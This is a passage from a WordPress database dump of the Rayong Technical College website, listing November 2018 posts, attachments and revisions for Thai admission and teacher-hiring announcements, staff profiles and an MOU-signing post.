'%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%8a%e0%b8%b1', '', '', '2018-11-05 14:55:45', '2018-11-05 07:55:45', '', 0, 'http://www.technicrayong.ac.th/?p=4234', 256, 'post', '', 0),
(4235, 3, '2018-11-05 14:52:33', '2018-11-05 07:52:33', '', 'ประกาศ การรับนักเรียนชั้นมัธยมศึกษาปีที่ 3 ประจำปีการศึกษา 2562', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%8a%e0%b8%b1', '', '', '2018-11-05 14:52:33', '2018-11-05 07:52:33', '', 4234, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-การรับนักเรียนชั้นมัธยมศึกษาปีที่-3-ประจำปีการศึกษา-2562.pdf', 0, 'attachment', 'application/pdf', 0),
(4236, 3, '2018-11-05 14:54:55', '2018-11-05 07:54:55', '', 'ประกาศ การรับนักเรียนชั้นมัธยมศึกษาปีที่ 3 ประจำปีการศึกษา 2562', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%8a-2', '', '', '2018-11-05 14:54:55', '2018-11-05 07:54:55', '', 4234, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-การรับนักเรียนชั้นมัธยมศึกษาปีที่-3-ประจำปีการศึกษา-2562-1.pdf', 0, 'attachment', 'application/pdf', 0),
(4237, 3, '2018-11-05 14:55:32', '2018-11-05 07:55:32', '', 'ประกาศ การรับนักเรียนชั้นมัธยมศึกษาปีที่ 3 ประจำปีการศึกษา 2562', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%8a-3', '', '', '2018-11-05 14:55:32', '2018-11-05 07:55:32', '', 4234, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-การรับนักเรียนชั้นมัธยมศึกษาปีที่-3-ประจำปีการศึกษา-2562-2.pdf', 0, 'attachment', 'application/pdf', 0),
(4238, 3, '2018-11-05 14:55:45', '2018-11-05 07:55:45', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%8A%E0%B8%B1%E0%B9%89%E0%B8%99%E0%B8%A1%E0%B8%B1%E0%B8%98%E0%B8%A2%E0%B8%A1%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2%E0%B8%9B%E0%B8%B5%E0%B8%97%E0%B8%B5%E0%B9%88-3-%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%88%E0%B8%B3%E0%B8%9B%E0%B8%B5%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2-2562-2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ การรับนักเรียนชั้นมัธยมศึกษาปีที่ 3 เข้าศึกษาในหลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) มัธยมศึกษาปีที่ 6 และประกาศนียบัตรวิชาชีพ (ปวช.) เข้าศึกษาในหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) เป็นกรณีพิเศษ (โควตา) ประจำปีการศึกษา 2562', '', 'inherit', 'closed', 'closed', '', '4234-revision-v1', '', '', '2018-11-05 14:55:45', '2018-11-05 07:55:45', '', 4234, 'http://www.technicrayong.ac.th/4234-revision-v1/', 0, 'revision', '', 0),
(4240, 3, '2018-11-06 22:33:21', '2018-11-06 15:33:21', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B5%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B9%8C%E0%B8%AA%E0%B8%AD%E0%B8%9A-%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้มีสิทธิสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง จำนวน 10 อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%a1%e0%b8%b5%e0%b8%aa%e0%b8%b4%e0%b8%97-4', '', '', '2018-11-07 08:56:29', '2018-11-07 01:56:29', '', 0, 'http://www.technicrayong.ac.th/?p=4240', 255, 'post', '', 0),
(4241, 3, '2018-11-06 22:32:37', '2018-11-06 15:32:37', '', 'dhcppc724634A82_000145', '', 'inherit', 'closed', 'closed', '', 'dhcppc724634a82_000145', '', '', '2018-11-06 22:32:37', '2018-11-06 15:32:37', '', 4240, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/dhcppc724634A82_000145.pdf', 0, 'attachment', 'application/pdf', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4242, 3, '2018-11-06 22:33:21', '2018-11-06 15:33:21', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2Fdhcppc724634A82_000145.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้มีสิทธิสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง จำนวน 10 อัตรา', '', 'inherit', 'closed', 'closed', '', '4240-revision-v1', '', '', '2018-11-06 22:33:21', '2018-11-06 15:33:21', '', 4240, 'http://www.technicrayong.ac.th/4240-revision-v1/', 0, 'revision', '', 0),
(4243, 3, '2018-11-07 08:55:53', '2018-11-07 01:55:53', '', 'ประกาศ รายชื่อผู้มีสิทธิสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง จำนวน 10 อัตรา', '', 'inherit', 'closed', 'closed', '', '4240-autosave-v1', '', '', '2018-11-07 08:55:53', '2018-11-07 01:55:53', '', 4240, 'http://www.technicrayong.ac.th/4240-autosave-v1/', 0, 'revision', '', 0),
(4244, 3, '2018-11-07 08:56:16', '2018-11-07 01:56:16', '', 'ประกาศรายชื่อผู้มีสิทธิ์สอบ ครูอัตราจ้าง', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%a1%e0%b8%b5%e0%b8%aa%e0%b8%b4%e0%b8%97%e0%b8%98-3', '', '', '2018-11-07 08:56:16', '2018-11-07 01:56:16', '', 4240, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศรายชื่อผู้มีสิทธิ์สอบ-ครูอัตราจ้าง.pdf', 0, 'attachment', 'application/pdf', 0),
(4245, 3, '2018-11-07 08:56:29', '2018-11-07 01:56:29', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B5%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B9%8C%E0%B8%AA%E0%B8%AD%E0%B8%9A-%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้มีสิทธิสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง จำนวน 10 อัตรา', '', 'inherit', 'closed', 'closed', '', '4240-revision-v1', '', '', '2018-11-07 08:56:29', '2018-11-07 01:56:29', '', 4240, 'http://www.technicrayong.ac.th/4240-revision-v1/', 0, 'revision', '', 0),
(4246, 3, '2018-11-07 09:24:48', '2018-11-07 02:24:48', '<a href=\"/wp-content/uploads/2018/01/รองอานุภาพ555-1.jpg\"><img class=\"aligncenter wp-image-3945 size-medium\" src=\"/wp-content/uploads/2018/01/รองอานุภาพ555-1-300x293.jpg\" alt=\"\" width=\"300\" height=\"293\" /></a>\r\n<h3 style=\"text-align: center;\">นายอานุภาพ วาสะสิริ\r\nรองผู้อำนวยการฝ่ายวิชาการ</h3>', 'รองผู้อำนวยการฝ่ายวิชาการ', '', 'inherit', 'closed', 'closed', '', '649-revision-v1', '', '', '2018-11-07 09:24:48', '2018-11-07 02:24:48', '', 649, 'http://www.technicrayong.ac.th/649-revision-v1/', 0, 'revision', '', 0),
(4248, 3, '2018-11-07 10:20:56', '2018-11-07 03:20:56', ' \n<h3></h3>\n<h3 style=\"text-align: center;\">Acting Sub Lt.Chucheep Arunluang</h3>\n<h3 style=\"text-align: center;\">Director of Rayong Technical College</h3>\n ', 'Director of Rayong Technical College', '', 'inherit', 'closed', 'closed', '', '926-autosave-v1', '', '', '2018-11-07 10:20:56', '2018-11-07 03:20:56', '', 926, 'http://www.technicrayong.ac.th/926-autosave-v1/', 0, 'revision', '', 0),
(4249, 3, '2018-11-07 10:21:22', '2018-11-07 03:21:22', '', 'ว่าที่เรือตรี ชูชีพ อรุณเหลือง', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a7%e0%b9%88%e0%b8%b2%e0%b8%97%e0%b8%b5%e0%b9%88%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b8%ad%e0%b8%95%e0%b8%a3%e0%b8%b5-%e0%b8%8a%e0%b8%b9%e0%b8%8a%e0%b8%b5%e0%b8%9e-%e0%b8%ad%e0%b8%a3%e0%b8%b8-2', '', '', '2018-11-07 10:21:22', '2018-11-07 03:21:22', '', 926, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/ว่าที่เรือตรี-ชูชีพ-อรุณเหลือง-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(4250, 3, '2018-11-07 10:21:57', '2018-11-07 03:21:57', ' \r\n<h3><img class=\"aligncenter size-full wp-image-4249\" src=\"/wp-content/uploads/2018/01/ว่าที่เรือตรี-ชูชีพ-อรุณเหลือง-1.jpg\" alt=\"\" width=\"220\" height=\"264\" /></h3>\r\n<h3 style=\"text-align: center;\">Acting Sub Lt.Chucheep Arunluang</h3>\r\n<h3 style=\"text-align: center;\">Director of Rayong Technical College</h3>\r\n ', 'Director of Rayong Technical College', '', 'inherit', 'closed', 'closed', '', '926-revision-v1', '', '', '2018-11-07 10:21:57', '2018-11-07 03:21:57', '', 926, 'http://www.technicrayong.ac.th/926-revision-v1/', 0, 'revision', '', 0),
(4251, 3, '2018-11-07 10:37:05', '2018-11-07 03:37:05', '<img class=\"aligncenter wp-image-4252\" src=\"/wp-content/uploads/2018/01/6-2-2561-9-55-14-1.jpg\" alt=\"\" width=\"220\" height=\"281\" />\n<h3 style=\"text-align: center;\">Mrs.Nattharee Sirikunpunyaporn\nDeputy Director of Resource Management</h3>', 'Deputy Director of Resource Management', '', 'inherit', 'closed', 'closed', '', '924-autosave-v1', '', '', '2018-11-07 10:37:05', '2018-11-07 03:37:05', '', 924, 'http://www.technicrayong.ac.th/924-autosave-v1/', 0, 'revision', '', 0),
(4252, 3, '2018-11-07 10:33:36', '2018-11-07 03:33:36', '', '6-2-2561 9-55-14', '', 'inherit', 'closed', 'closed', '', '6-2-2561-9-55-14-2', '', '', '2018-11-07 10:33:36', '2018-11-07 03:33:36', '', 924, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/6-2-2561-9-55-14-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(4253, 3, '2018-11-07 10:39:19', '2018-11-07 03:39:19', '<img class=\"aligncenter wp-image-4252\" src=\"/wp-content/uploads/2018/01/6-2-2561-9-55-14-1.jpg\" alt=\"\" width=\"220\" height=\"281\" />\r\n<h3 style=\"text-align: center;\">Mrs.Nattharee Sirikunpunyaporn\r\nDeputy Director of Resource Management</h3>', 'Deputy Director of Resource Management', '', 'inherit', 'closed', 'closed', '', '924-revision-v1', '', '', '2018-11-07 10:39:19', '2018-11-07 03:39:19', '', 924, 'http://www.technicrayong.ac.th/924-revision-v1/', 0, 'revision', '', 0),
(4254, 3, '2018-11-07 10:50:05', '2018-11-07 03:50:05', ' \n<h3><img class=\"aligncenter wp-image-4255\" src=\"/wp-content/uploads/2018/01/รองอานุภาพ555-2.jpg\" alt=\"\" width=\"220\" height=\"215\" /></h3>\n<h3 style=\"text-align: center;\">Mr.Anuphap Wasasiri</h3>\n<h3 style=\"text-align: center;\">Deputy Director of Academic Affairs</h3>', 'Deputy Director of Academic Affairs', '', 'inherit', 'closed', 'closed', '', '922-autosave-v1', '', '', '2018-11-07 10:50:05', '2018-11-07 03:50:05', '', 922, 'http://www.technicrayong.ac.th/922-autosave-v1/', 0, 'revision', '', 0),
(4255, 3, '2018-11-07 10:49:22', '2018-11-07 03:49:22', '', 'รองอานุภาพ555', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%ad%e0%b8%b2%e0%b8%99%e0%b8%b8%e0%b8%a0%e0%b8%b2%e0%b8%9e555-2', '', '', '2018-11-07 10:49:22', '2018-11-07 03:49:22', '', 922, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/รองอานุภาพ555-2.jpg', 0, 'attachment', 'image/jpeg', 0),
(4256, 3, '2018-11-07 10:50:48', '2018-11-07 03:50:48', ' \r\n<h3><img class=\"aligncenter wp-image-4255\" src=\"/wp-content/uploads/2018/01/รองอานุภาพ555-2.jpg\" alt=\"\" width=\"220\" height=\"215\" /></h3>\r\n<h3 style=\"text-align: center;\">Mr.Anuphap Wasasiri</h3>\r\n<h3 style=\"text-align: center;\">Deputy Director of Academic Affairs</h3>', 'Deputy Director of Academic Affairs', '', 'inherit', 'closed', 'closed', '', '922-revision-v1', '', '', '2018-11-07 10:50:48', '2018-11-07 03:50:48', '', 922, 'http://www.technicrayong.ac.th/922-revision-v1/', 0, 'revision', '', 0),
(4257, 3, '2018-11-07 10:52:59', '2018-11-07 03:52:59', '', '6-2-2561 9-56-49', '', 'inherit', 'closed', 'closed', '', '6-2-2561-9-56-49-2', '', '', '2018-11-07 10:52:59', '2018-11-07 03:52:59', '', 920, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/6-2-2561-9-56-49-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(4258, 3, '2018-11-07 10:53:02', '2018-11-07 03:53:02', ' \n<h3></h3>\n<h3 style=\"text-align: center;\">Mr.Yuttana Onsomkrit</h3>\n<h3 style=\"text-align: center;\">Deputy Director of Student Affairs Development</h3>', 'Deputy Director of Student Affairs Development', '', 'inherit', 'closed', 'closed', '', '920-autosave-v1', '', '', '2018-11-07 10:53:02', '2018-11-07 03:53:02', '', 920, 'http://www.technicrayong.ac.th/920-autosave-v1/', 0, 'revision', '', 0),
(4259, 3, '2018-11-07 10:53:58', '2018-11-07 03:53:58', ' \r\n<h3><img class=\"aligncenter wp-image-4257\" src=\"/wp-content/uploads/2018/01/6-2-2561-9-56-49-1.jpg\" alt=\"\" width=\"220\" height=\"293\" /></h3>\r\n<h3 style=\"text-align: center;\">Mr.Yuttana Onsomkrit</h3>\r\n<h3 style=\"text-align: center;\">Deputy Director of Student Affairs Development</h3>', 'Deputy Director of Student Affairs Development', '', 'inherit', 'closed', 'closed', '', '920-revision-v1', '', '', '2018-11-07 10:53:58', '2018-11-07 03:53:58', '', 920, 'http://www.technicrayong.ac.th/920-revision-v1/', 0, 'revision', '', 0),
(4260, 3, '2018-11-07 11:04:39', '2018-11-07 04:04:39', '<h3><img class=\"aligncenter wp-image-4261\" src=\"/wp-content/uploads/2018/11/2-11-2561-13-38-39.jpg\" alt=\"\" width=\"220\" height=\"278\" /></h3>\r\n<h3 style=\"text-align: center;\">Ph.D.Phumipat Kaewmool</h3>\r\n<h3 style=\"text-align: center;\">Deputy Director of Planning and Cooperation</h3>', 'Deputy Director of Planning and Cooperation', '', 'publish', 'closed', 'open', '', 'deputy-director-of-planning-and-cooperation', '', '', '2018-11-07 11:04:39', '2018-11-07 04:04:39', '', 0, 'http://www.technicrayong.ac.th/?p=4260', 254, 'post', '', 0),
(4261, 3, '2018-11-07 11:03:27', '2018-11-07 04:03:27', '', '2-11-2561 13-38-39', '', 'inherit', 'closed', 'closed', '', '2-11-2561-13-38-39-2', '', '', '2018-11-07 11:04:29', '2018-11-07 04:04:29', '', 4260, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/2-11-2561-13-38-39.jpg', 0, 'attachment', 'image/jpeg', 0),
(4262, 3, '2018-11-07 11:04:39', '2018-11-07 04:04:39', '<h3><img class=\"aligncenter wp-image-4261\" src=\"/wp-content/uploads/2018/11/2-11-2561-13-38-39.jpg\" alt=\"\" width=\"220\" height=\"278\" /></h3>\r\n<h3 style=\"text-align: center;\">Ph.D.Phumipat Kaewmool</h3>\r\n<h3 style=\"text-align: center;\">Deputy Director of Planning and Cooperation</h3>', 'Deputy Director of Planning and Cooperation', '', 'inherit', 'closed', 'closed', '', '4260-revision-v1', '', '', '2018-11-07 11:04:39', '2018-11-07 04:04:39', '', 4260, 'http://www.technicrayong.ac.th/4260-revision-v1/', 0, 'revision', '', 0),
(4263, 3, '2018-11-07 11:05:30', '2018-11-07 04:05:30', ' \r\n<h3><img class=\"aligncenter wp-image-4257\" src=\"/wp-content/uploads/2018/01/6-2-2561-9-56-49-1.jpg\" alt=\"\" width=\"220\" height=\"293\" /></h3>\r\n<h3 style=\"text-align: center;\">Mr.Yutthana Onsomkrit</h3>\r\n<h3 style=\"text-align: center;\">Deputy Director of Student Affairs Development</h3>', 'Deputy Director of Student Affairs Development', '', 'inherit', 'closed', 'closed', '', '920-revision-v1', '', '', '2018-11-07 11:05:30', '2018-11-07 04:05:30', '', 920, 'http://www.technicrayong.ac.th/920-revision-v1/', 0, 'revision', '', 0),
(4264, 3, '2018-11-07 11:07:00', '2018-11-07 04:07:00', ' \r\n<h3><img class=\"aligncenter wp-image-4255\" src=\"/wp-content/uploads/2018/01/รองอานุภาพ555-2.jpg\" alt=\"\" width=\"220\" height=\"215\" /></h3>\r\n<h3 style=\"text-align: center;\">Mr.Anuphap Vasasiri</h3>\r\n<h3 style=\"text-align: center;\">Deputy Director of Academic Affairs</h3>', 'Deputy Director of Academic Affairs', '', 'inherit', 'closed', 'closed', '', '922-revision-v1', '', '', '2018-11-07 11:07:00', '2018-11-07 04:07:00', '', 922, 'http://www.technicrayong.ac.th/922-revision-v1/', 0, 'revision', '', 0),
(4265, 3, '2018-11-08 10:45:49', '2018-11-08 03:45:49', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D703272476715610%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ ๖ พฤศจิกายน ๒๕๖๑ บริษัท เดลีเซีย จำกัด และ บริษัท อริยา เอสเตท จำกัด เข้าร่วมพิธีลงนามความร่วมมือ(MOU) กับวิทยาลัยเทคนิคระยอง เพื่อส่งเสริมและสนับสนุน ความร่วมมือทางด้านวิชาการ การจัดหลักสูตรเทคโนโลยี และเป็นส่วนหนึ่งที่จะตอบสนองความต้องการของการผลิตและพัฒนากำลังคนในอุตสาหกรรม ๔.๐ และภาคบริการโดยดำเนินการภายใต้ความร่วมมือของสถานประกอบการ และหน่วยงานในพื้นที่ทุกภาคส่วน ณ ห้องประชุมศูนย์ประสานงานการผลิตและพัฒนากำลังคนอาชีวศึกษา เขตพัฒนาพิเศษภาคตะวันออก จังหวัดระยอง ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%96-%e0%b8%9e%e0%b8%a4%e0%b8%a8%e0%b8%88%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a2%e0%b8%99', '', '', '2018-11-08 14:11:38', '2018-11-08 07:11:38', '', 0, 'http://www.technicrayong.ac.th/?p=4265', 253, 'post', '', 0),
(4266, 3, '2018-11-08 10:42:50', '2018-11-08 03:42:50', '', '45491621_703270023382522_3554106061872955392_o', '', 'inherit', 'closed', 'closed', '', '45491621_703270023382522_3554106061872955392_o', '', '', '2018-11-08 10:42:50', '2018-11-08 03:42:50', '', 4265, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/45491621_703270023382522_3554106061872955392_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4267, 3, '2018-11-08 10:45:49', '2018-11-08 03:45:49', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D703272476715610%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ ๖ พฤศจิกายน ๒๕๖๑ บริษัท เดลีเซีย จำกัด และ บริษัท อริยา เอสเตท จำกัด เข้าร่วมพิธีลงนามความร่วมมือ(MOU) กับวิทยาลัยเทคนิคระยอง เพื่อส่งเสริมและสนับสนุน ความร่วมมือทางด้านวิชาการ การจัดหลักสูตรเทคโนโลยี และเป็นส่วนหนึ่งที่จะตอบสนองความต้องการของการผลิตและพัฒนากำลังคนในอุตสาหกรรม 4.0 และภาคบริการโดยดำเนินการภายใต้ความร่วมมือของสถานประกอบการ และหน่วยงานในพื้นที่ทุกภาคส่วน ณ ห้องประชุมศูนย์ประสานงานการผลิตและพัฒนากำลังคนอาชีวศึกษา เขตพัฒนาพิเศษภาคตะวันออก จังหวัดระยอง ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4265-revision-v1', '', '', '2018-11-08 10:45:49', '2018-11-08 03:45:49', '', 4265, 'http://www.technicrayong.ac.th/4265-revision-v1/', 0, 'revision', '', 0),
(4268, 3, '2018-11-08 14:11:38', '2018-11-08 07:11:38', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D703272476715610%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ ๖ พฤศจิกายน ๒๕๖๑ บริษัท เดลีเซีย จำกัด และ บริษัท อริยา เอสเตท จำกัด เข้าร่วมพิธีลงนามความร่วมมือ(MOU) กับวิทยาลัยเทคนิคระยอง เพื่อส่งเสริมและสนับสนุน ความร่วมมือทางด้านวิชาการ การจัดหลักสูตรเทคโนโลยี และเป็นส่วนหนึ่งที่จะตอบสนองความต้องการของการผลิตและพัฒนากำลังคนในอุตสาหกรรม ๔.๐ และภาคบริการโดยดำเนินการภายใต้ความร่วมมือของสถานประกอบการ และหน่วยงานในพื้นที่ทุกภาคส่วน ณ ห้องประชุมศูนย์ประสานงานการผลิตและพัฒนากำลังคนอาชีวศึกษา เขตพัฒนาพิเศษภาคตะวันออก จังหวัดระยอง ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4265-revision-v1', '', '', '2018-11-08 14:11:38', '2018-11-08 07:11:38', '', 4265, 'http://www.technicrayong.ac.th/4265-revision-v1/', 0, 'revision', '', 0),
(4269, 3, '2018-11-08 14:48:31', '2018-11-08 07:48:31', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง จำนวน ๑๒ อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9c%e0%b8%a5%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b9%80%e0%b8%9b%e0%b9%87', '', '', '2018-11-08 14:48:31', '2018-11-08 07:48:31', '', 0, 'http://www.technicrayong.ac.th/?p=4269', 252, 'post', '', 0),
(4270, 3, '2018-11-08 14:48:15', '2018-11-08 07:48:15', '', 'ประกาศ ครูอัตราจ้าง', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b8%ad%e0%b8%b1%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b9%89%e0%b8%b2%e0%b8%87', '', '', '2018-11-08 14:48:15', '2018-11-08 07:48:15', '', 4269, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-ครูอัตราจ้าง.pdf', 0, 'attachment', 'application/pdf', 0),
(4271, 3, '2018-11-08 14:48:31', '2018-11-08 07:48:31', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ผลสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง จำนวน ๑๒ อัตรา', '', 'inherit', 'closed', 'closed', '', '4269-revision-v1', '', '', '2018-11-08 14:48:31', '2018-11-08 07:48:31', '', 4269, 'http://www.technicrayong.ac.th/4269-revision-v1/', 0, 'revision', '', 0),
(4275, 1, '2018-11-08 20:59:22', '2018-11-08 13:59:22', '', 'Asset 2@4x', '', 'inherit', 'closed', 'closed', '', 'asset-24x', '', '', '2018-11-08 20:59:22', '2018-11-08 13:59:22', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/Asset-2@4x.png', 0, 'attachment', 'image/png', 0),
